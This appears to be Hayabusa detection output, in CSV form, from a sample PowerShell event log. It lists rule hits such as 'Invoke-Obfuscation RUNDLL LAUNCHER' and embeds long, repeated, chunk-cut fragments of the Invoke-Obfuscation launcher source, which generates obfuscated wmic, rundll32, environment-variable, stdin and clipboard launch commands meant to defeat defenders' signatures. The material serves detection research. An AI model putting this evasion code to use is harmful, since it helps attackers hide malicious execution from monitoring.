([Char[]](Get-Random -Input @('[String][Char]34','([Char]34).ToString()')) | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' If($ScriptString.Length-$ScriptString.Replace('""','').Length -le 5) { # Replace double quote(s) with randomly selected ASCII value conversion representation -- inline concatenation. $SubstitutionSyntax = ('\""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + '+' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $CharCastDoubleQuote + ' '*(Get-Random -Minimum 0 -Maximum 3) + '+' + ' '*(Get-Random -Minimum 0 -Maximum 3) + '\""') $ScriptString = $ScriptString.Replace('""',$SubstitutionSyntax).Replace('\""\""+','').Replace('\""\"" +','').Replace('\""\"" +','').Replace('\""\"" +','') } Else { # Characters we will use to generate random variable names. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(1..2)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Keep generating random variables until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($RandomVarName.ToLower())) { $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') $RandomVarLength++ } # Randomly decide if the variable name will be concatenated inline or not. $RandomVarNameMaybeConcatenated = $RandomVarName",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.296 +00:00,SEC511,4104,high,Exec,Suspicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.296 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"If((Get-Random -Input @(0..1)) -eq 0) { $RandomVarNameMaybeConcatenated = '(' + (Out-ConcatenatedString $RandomVarName ""'"") + ')' } # Generate random variable SET syntax. $RandomVarSetSyntax = @() $RandomVarSetSyntax += '$' + $RandomVarName + ' '*(Get-Random @(0..2)) + '=' + ' '*(Get-Random @(0..2)) + $CharCastDoubleQuote $RandomVarSetSyntax += (Get-Random -Input @('Set-Variable','SV','Set')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $CharCastDoubleQuote + ' '*(Get-Random @(0..2)) + ')' # Randomly choose from above variable syntaxes. $RandomVarSet = (Get-Random -Input $RandomVarSetSyntax) # Replace double quotes with randomly selected ASCII value conversion representation -- variable replacement to save space for high counts of double quotes to substitute. $SetVariables += $RandomVarSet + ' '*(Get-Random @(1..2)) + ';' $ScriptString = $ScriptString.Replace('""',""`${$RandomVarName}"") } } # Randomly select a syntax for the Char conversion of a comma ASCII value and then ramdomize the case. $CharCastComma= ([Char[]](Get-Random -Input @('[String][Char]44','([Char]44).ToString()')) | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' If($ScriptString.Length-$ScriptString.Replace(',','').Length -le 5) { # Replace commas with randomly selected ASCII value conversion representation -- inline concatenation. $SubstitutionSyntax = ('\""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + '+' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $CharCastComma + ' '*(Get-Random -Minimum 0 -Maximum 3) + '+' + ' '*(Get-Random -Minimum 0 -Maximum 3) + '\""') $ScriptString = $ScriptString.Replace(',',$SubstitutionSyntax).Replace('\""\""+','').Replace('\""\"" +','').Replace('\""\"" +','').Replace('\""\"" +','') } Else { # Characters we will use to generate random variable names. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(1..2)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Keep generating random variables until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($RandomVarName.ToLower())) { $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') $RandomVarLength++ } # Randomly decide if the variable name will be concatenated inline or not. $RandomVarNameMaybeConcatenated = $RandomVarName If((Get-Random -Input @(0..1)) -eq 0) { $RandomVarNameMaybeConcatenated = '(' + (Out-ConcatenatedString $RandomVarName ""'"") + ')' } # Generate random variable SET syntax. $RandomVarSetSyntax = @() $RandomVarSetSyntax += '$' + $RandomVarName + ' '*(Get-Random @(0..2)) + '=' + ' '*(Get-Random @(0..2)) + $CharCastComma $RandomVarSetSyntax += (Get-Random -Input @('Set-Variable','SV','Set')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $CharCastComma + ' '*(Get-Random @(0..2)) + ')' # Randomly choose from above variable syntaxes. $RandomVarSet = (Get-Random -Input $RandomVarSetSyntax) # Replace commas with randomly selected ASCII value conversion representation -- variable replacement to save space for high counts of commas to substitute. $SetVariables += $RandomVarSet + ' '*(Get-Random @(1..2)) + ';' $ScriptString = $ScriptString.Replace(',',""`${$RandomVarName}"") } # Encapsulate entire command with escaped double quotes since entire command is now an inline concatenated string to support the above character substitution(s). $ScriptString = '\""' + $ScriptString + '\""' # Randomly decide on invoke operation since we've applied an additional layer of string manipulation in above steps. # Keep running Out-EncapsulatedInvokeExpression until we get a syntax that does NOT contain commas. # Examples like .((gv '*mdR*').Name[3,11,2]-Join'') can have their commas escaped like in above step. However, wmic.exe errors with opening [ without a closing ] in the string literal. $ScriptStringTemp = ',' While($ScriptStringTemp.Contains(',')) { $ScriptStringTemp = Out-EncapsulatedInvokeExpression $ScriptString } # Now that we have an invocation syntax that does not contain commas we will set $ScriptStringTemp's results back into $ScriptString. $ScriptString = $ScriptStringTemp # Prepend with $SetVariables (which will be blank if no variables were set in above sustitution logic depending on the number of double quotes and commas that need to be replaced. $ScriptString = $SetVariables + $ScriptString } # Generate random case syntax for PROCESS CALL CREATE arguments for WMIC.exe. $WmicArguments = ([Char[]]'process call create' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Randomize the whitespace between each element of $WmicArguments which randomly deciding between encapsulating each argument with single quotes, double quotes or no quote. $WmicArguments = (($WmicArguments.Split(' ') | ForEach-Object {$RandomQuotes = (Get-Random -Input @('""',""'"",' ')); $RandomQuotes + $_ + $RandomQuotes + ' '*(Get-Random -Minimum 1 -Maximum 4)}) -Join '').Trim() # Pair escaped double quotes with a prepended additional double quote so that wmic.exe does not treat the string as a separate argument for wmic.exe but the double quote still exists for powershell.exe's functionality. If($ScriptString.Contains('\""')) { $ScriptString = $ScriptString.Replace('\""','""\""') } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $ScriptString $WmicCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $WmicArguments + ' '*(Get-Random -Minimum 1 -Maximum 4) + '""' + $PathToPowerShell + $PSCmdSyntax + '""' # Set argument info for process tree output after this Switch block. # Even though wmic.exe will show in command line arguments, it will not be the parent process of powershell.exe. Instead, the already-existing instance of WmiPrvSE.exe will spawn powershell.exe. $ArgsDefenderWillSee += , @(""[Unrelated to WMIC.EXE execution] C:\WINDOWS\system32\wbem\wmiprvse.exe"", "" -secured -Embedding"") $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax) $CmdLineOutput = $PathToWmic + $WmicCmdSyntax } 4 { ############ ## RUNDLL ## ############ # Shout out and big thanks to Matt Graeber (@mattifestation) for pointing out this method of executing any binary directly from rundll32.exe. # Undo escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^') } # Generate random case syntax for SHELL32.DLL argument for RunDll32.exe. $Shell32Dll = ([Char[]]'SHELL32.DLL' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Put the execution flags in the format required by rundll32.exe: each argument separately encapusulated in double quotes. $ExecutionFlagsRunDllSyntax = ($PowerShellFlagsArray | Where-Object {$_.Trim().Length -gt 0} | ForEach-Object {'""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $_ + ' '*(Get-Random -Minimum 0 -Maximum 3) + '""' + ' '*(Get-Random -Minimum 1 -Maximum 4)}) -Join '' # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $ExecutionFlagsRunDllSyntax + ' '*(Get-Random -Minimum 1 -Maximum 4) + ""`""$ScriptString`"""" $RunDllCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $Shell32Dll + (Get-Random -Input @(',',' ', ((Get-Random -Input @(',',',',',',' ',' ',' ') -Count (Get-Random -Input @(4..6)))-Join''))) + 'ShellExec_RunDLL' + ' '*(Get-Random -Minimum 1 -Maximum 4) + ""`""$PathToPowerShell`"""" + $PSCmdSyntax # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToRunDll , $RunDllCmdSyntax) $ArgsDefenderWillSee += , @(""`""$PathToPowerShell`"""", $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToRunDll + $RunDllCmdSyntax } 5 { ########## ## VAR+ ## ########## # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable name to store the $ScriptString command. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. $InvokeVariableSyntax = Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName # Generate random case syntax for setting the above random variable name. $SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Build out command line syntax in reverse so we can di",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.296 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"If((Get-Random -Input @(0..1)) -eq 0) { $RandomVarNameMaybeConcatenated = '(' + (Out-ConcatenatedString $RandomVarName ""'"") + ')' } # Generate random variable SET syntax. $RandomVarSetSyntax = @() $RandomVarSetSyntax += '$' + $RandomVarName + ' '*(Get-Random @(0..2)) + '=' + ' '*(Get-Random @(0..2)) + $CharCastDoubleQuote $RandomVarSetSyntax += (Get-Random -Input @('Set-Variable','SV','Set')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $CharCastDoubleQuote + ' '*(Get-Random @(0..2)) + ')' # Randomly choose from above variable syntaxes. $RandomVarSet = (Get-Random -Input $RandomVarSetSyntax) # Replace double quotes with randomly selected ASCII value conversion representation -- variable replacement to save space for high counts of double quotes to substitute. $SetVariables += $RandomVarSet + ' '*(Get-Random @(1..2)) + ';' $ScriptString = $ScriptString.Replace('""',""`${$RandomVarName}"") } } # Randomly select a syntax for the Char conversion of a comma ASCII value and then ramdomize the case. $CharCastComma= ([Char[]](Get-Random -Input @('[String][Char]44','([Char]44).ToString()')) | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' If($ScriptString.Length-$ScriptString.Replace(',','').Length -le 5) { # Replace commas with randomly selected ASCII value conversion representation -- inline concatenation. $SubstitutionSyntax = ('\""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + '+' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $CharCastComma + ' '*(Get-Random -Minimum 0 -Maximum 3) + '+' + ' '*(Get-Random -Minimum 0 -Maximum 3) + '\""') $ScriptString = $ScriptString.Replace(',',$SubstitutionSyntax).Replace('\""\""+','').Replace('\""\"" +','').Replace('\""\"" +','').Replace('\""\"" +','') } Else { # Characters we will use to generate random variable names. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(1..2)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Keep generating random variables until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($RandomVarName.ToLower())) { $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') $RandomVarLength++ } # Randomly decide if the variable name will be concatenated inline or not. $RandomVarNameMaybeConcatenated = $RandomVarName If((Get-Random -Input @(0..1)) -eq 0) { $RandomVarNameMaybeConcatenated = '(' + (Out-ConcatenatedString $RandomVarName ""'"") + ')' } # Generate random variable SET syntax. $RandomVarSetSyntax = @() $RandomVarSetSyntax += '$' + $RandomVarName + ' '*(Get-Random @(0..2)) + '=' + ' '*(Get-Random @(0..2)) + $CharCastComma $RandomVarSetSyntax += (Get-Random -Input @('Set-Variable','SV','Set')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $CharCastComma + ' '*(Get-Random @(0..2)) + ')' # Randomly choose from above variable syntaxes. $RandomVarSet = (Get-Random -Input $RandomVarSetSyntax) # Replace commas with randomly selected ASCII value conversion representation -- variable replacement to save space for high counts of commas to substitute. $SetVariables += $RandomVarSet + ' '*(Get-Random @(1..2)) + ';' $ScriptString = $ScriptString.Replace(',',""`${$RandomVarName}"") } # Encapsulate entire command with escaped double quotes since entire command is now an inline concatenated string to support the above character substitution(s). $ScriptString = '\""' + $ScriptString + '\""' # Randomly decide on invoke operation since we've applied an additional layer of string manipulation in above steps. # Keep running Out-EncapsulatedInvokeExpression until we get a syntax that does NOT contain commas. # Examples like .((gv '*mdR*').Name[3,11,2]-Join'') can have their commas escaped like in above step. However, wmic.exe errors with opening [ without a closing ] in the string literal. $ScriptStringTemp = ',' While($ScriptStringTemp.Contains(',')) { $ScriptStringTemp = Out-EncapsulatedInvokeExpression $ScriptString } # Now that we have an invocation syntax that does not contain commas we will set $ScriptStringTemp's results back into $ScriptString. $ScriptString = $ScriptStringTemp # Prepend with $SetVariables (which will be blank if no variables were set in above sustitution logic depending on the number of double quotes and commas that need to be replaced. $ScriptString = $SetVariables + $ScriptString } # Generate random case syntax for PROCESS CALL CREATE arguments for WMIC.exe. $WmicArguments = ([Char[]]'process call create' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Randomize the whitespace between each element of $WmicArguments which randomly deciding between encapsulating each argument with single quotes, double quotes or no quote. $WmicArguments = (($WmicArguments.Split(' ') | ForEach-Object {$RandomQuotes = (Get-Random -Input @('""',""'"",' ')); $RandomQuotes + $_ + $RandomQuotes + ' '*(Get-Random -Minimum 1 -Maximum 4)}) -Join '').Trim() # Pair escaped double quotes with a prepended additional double quote so that wmic.exe does not treat the string as a separate argument for wmic.exe but the double quote still exists for powershell.exe's functionality. If($ScriptString.Contains('\""')) { $ScriptString = $ScriptString.Replace('\""','""\""') } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $ScriptString $WmicCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $WmicArguments + ' '*(Get-Random -Minimum 1 -Maximum 4) + '""' + $PathToPowerShell + $PSCmdSyntax + '""' # Set argument info for process tree output after this Switch block. # Even though wmic.exe will show in command line arguments, it will not be the parent process of powershell.exe. Instead, the already-existing instance of WmiPrvSE.exe will spawn powershell.exe. $ArgsDefenderWillSee += , @(""[Unrelated to WMIC.EXE execution] C:\WINDOWS\system32\wbem\wmiprvse.exe"", "" -secured -Embedding"") $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax) $CmdLineOutput = $PathToWmic + $WmicCmdSyntax } 4 { ############ ## RUNDLL ## ############ # Shout out and big thanks to Matt Graeber (@mattifestation) for pointing out this method of executing any binary directly from rundll32.exe. # Undo escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^') } # Generate random case syntax for SHELL32.DLL argument for RunDll32.exe. $Shell32Dll = ([Char[]]'SHELL32.DLL' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Put the execution flags in the format required by rundll32.exe: each argument separately encapusulated in double quotes. $ExecutionFlagsRunDllSyntax = ($PowerShellFlagsArray | Where-Object {$_.Trim().Length -gt 0} | ForEach-Object {'""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $_ + ' '*(Get-Random -Minimum 0 -Maximum 3) + '""' + ' '*(Get-Random -Minimum 1 -Maximum 4)}) -Join '' # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $ExecutionFlagsRunDllSyntax + ' '*(Get-Random -Minimum 1 -Maximum 4) + ""`""$ScriptString`"""" $RunDllCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $Shell32Dll + (Get-Random -Input @(',',' ', ((Get-Random -Input @(',',',',',',' ',' ',' ') -Count (Get-Random -Input @(4..6)))-Join''))) + 'ShellExec_RunDLL' + ' '*(Get-Random -Minimum 1 -Maximum 4) + ""`""$PathToPowerShell`"""" + $PSCmdSyntax # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToRunDll , $RunDllCmdSyntax) $ArgsDefenderWillSee += , @(""`""$PathToPowerShell`"""", $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToRunDll + $RunDllCmdSyntax } 5 { ########## ## VAR+ ## ########## # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable name to store the $ScriptString command. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. $InvokeVariableSyntax = Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName # Generate random case syntax for setting the above random variable name. $SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Build out command line syntax in reverse so we can di",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.296 +00:00,SEC511,4104,medium,Evas | Exec,Invoke-Obfuscation RUNDLL LAUNCHER,,rules/sigma/powershell/powershell_script/posh_ps_invoke_obfuscation_via_rundll.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.296 +00:00,SEC511,4104,high,Exec,Suspicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.296 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"splay the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $InvokeVariableSyntax $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + $ScriptString + '&&' + ' '*(Get-Random -Minimum 0 -Maximum 4) + $PathToPowerShell + $PSCmdSyntax + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 6 { ############ ## STDIN+ ## ############ # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking powershell.exe's StdIn. $PowerShellStdin = Out-RandomPowerShellStdInInvokeSyntax # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $PowerShellStdin $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $Echo + (Get-Random -Input ('/','\',' '*(Get-Random -Minimum 1 -Maximum 3))) + $ScriptString + ' '*(Get-Random -Minimum 1 -Maximum 3) + '|' + ' '*(Get-Random -Minimum 1 -Maximum 3) + $PathToPowerShell + $PSCmdSyntax + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 7 { ########### ## CLIP+ ## ########### # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking powershell.exe's StdIn. $PowerShellClip = Out-RandomClipboardInvokeSyntax # If this launcher is run in PowerShell 2.0 then Single-Threaded Apartment must be specified with -st or -sta. # Otherwise you will get the following error: ""Current thread must be set to single thread apartment (STA) mode before OLE calls can be made."" # Since Invoke-Obfuscation output is designed to run on any PowerShell version then for this launcher we will add the -st/-sta flag to $PowerShellFlags. # If selected then the -Command flag needs to remain last (where it currently is). $CommandFlagValue = $NULL If($PSBoundParameters['Command'] -OR $Command) { $UpperLimit = $PowerShellFlagsArray.Count-1 $CommandFlagValue = $PowerShellFlagsArray[$PowerShellFlagsArray.Count-1] } Else { $UpperLimit = $PowerShellFlagsArray.Count } # Re-extract PowerShellFlags so we can add in -st/-sta and then reorder (maintaining command flag at the end if present). $PowerShellFlags = @() For($i=0; $i -lt $UpperLimit; $i++) { $PowerShellFlags += $PowerShellFlagsArray[$i] } # Add in -st/-sta to PowerShellFlags. $PowerShellFlags += (Get-Random -Input @('-st','-sta')) # Randomize the order of the command-line arguments. # This is to prevent the Blue Team from placing false hope in simple signatures for consistent ordering of these arguments. If($PowerShellFlags.Count -gt 1) { $PowerShellFlags = Get-Random -InputObject $PowerShellFlags -Count $PowerShellFlags.Count } # If selected then the -Command flag needs to be added last. If($CommandFlagValue) { $PowerShellFlags += $CommandFlagValue } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Insert random-length whitespace between all command-line arguments. $PowerShellFlags = ($PowerShellFlags | ForEach-Object {$_ + ' '*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $PowerShellFlags = ' '*(Get-Random -Minimum 1 -Maximum 3) + $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $PowerShellClip $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $Echo + (Get-Random -Input ('/','\',' '*(Get-Random -Minimum 1 -Maximum 3))) + $ScriptString + ' '*(Get-Random -Minimum 0 -Maximum 2) + '|' + ' '*(Get-Random -Minimum 0 -Maximum 2) + $PathToClip + ' '*(Get-Random -Minimum 0 -Maximum 2) + '&&' + ' '*(Get-Random -Minimum 1 -Maximum 3) + $PathToPowerShell + $PSCmdSyntax + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 8 { ########### ## VAR++ ## ########### # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable names to store the $ScriptString command and PowerShell syntax. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName2 = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName2 = ([Char[]]$VariableName2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random case syntax for setting the above random variable names. $SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' $SetSyntax2 = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax2 = $SetSyntax2 + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName2 + '=' # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax2 = ([Char[]]$SetSyntax2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = 